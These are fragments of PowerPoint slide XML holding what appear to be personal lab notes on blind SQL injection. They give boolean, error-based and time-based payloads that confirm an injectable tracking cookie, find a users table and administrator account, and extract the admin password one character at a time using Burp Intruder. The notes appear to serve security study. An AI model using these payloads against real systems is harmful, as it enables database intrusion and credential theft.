              <a:t>TrackingId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>TrackedUsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>TrackingId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> = 'rEUHIfcKKKWib5b2' </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	AND (SELECT username from users where username='administrator' and LENGTH(password)&gt;1)='administrator'--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>know </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>exect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> password length use intruder: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>option---&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>pass_length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>(1)-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>sniper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>					    payload-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>-&gt;1-50-&gt;start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Guess the 1st </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>charecter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> of password:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>query---&gt;SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>TrackingId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>TrackedUsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>TrackingId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> = 'rEUHIfcKKKWib5b2' </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	AND (SELECT substring(password,1,1)from users where username='administrator')='a'-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>				##(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>=1st_cha;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>Only_one_cha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Intrude</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>r:option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>pass_cha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>(a)-&gt;sniper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>		 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>	   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>payload-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>brutefourcer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>-&gt;1-1-&gt;start attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>find 19 cha::::: intruder(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>clasterBomber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>)---&gt;substring(password,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>,1)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>NUmber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>countinue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>++</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>				 		 ='a'-(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>Bruterforcer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12793785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GB" u="sng" dirty="0"/>
              <a:t>Inducing conditional responses by triggering SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0" smtClean="0"/>
              <a:t>errors:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0"/>
              <a:t>1.Prove that parameter is vulnerable:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>quatation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>---&gt;error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	close the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>quate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>---&gt;no error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	Check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>===   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>' || (select '') || '</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>payload:  ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>|| (select '' from dual) || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>‘ --&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>oracle database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>So,it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> is vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>.....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>2.Confirm that we have a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> in the database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>paylaod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>: ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>|| (select '' from users) || '</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>		' || (select '' from users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>rownum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>=1) || ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>###</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>show only 1st row</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	So</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>table exist in database.....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16989973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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>3.Confirm that we have a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>administrator user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>in the users database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>: ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>|| (select '' from users where username='administrator') || '</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>###/this always show right...so need to change something ###/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>		'||(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>###/(1=1)Error (1=0)Ok...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>TO_CHAR-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>convert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>string to number in oracle ###/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>'||(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username='administrator')||'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>EVALUTION::First run FROM clause, then SELECT clause</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   If administrator exist, then run (1=1) and give an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>500 Internal Server Error-----so, administrator user exist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.......</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>4.Determine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> of password:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	payload:'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username='administrator' and LENGTH(password)&gt;1)||'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>EVALUTION::If return False/500 Internal Server Error, then payload is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>okkkk</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>if return OK/200 , then payload is false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	we can know </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>exect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> length of password using intruder.....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42382380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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>5.Determine the password:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	payload:'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username='administrator' and SUBSTR(password,1,1)='a')||'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>EVALUTION::If got 200/ok, then '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>a'is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t> not first character...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>				if get error/500, then '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>a'is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t> 1st character....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	use intruder to know the result...... </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23202889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GB" b="1" u="sng" dirty="0"/>
              <a:t>Exploiting blind SQL injection by triggering time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>delays(time based):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Quary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>:::select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>tracking_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>tracking_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>trackingID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>shjfhsjf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>' || (select sleep(10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>))--';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
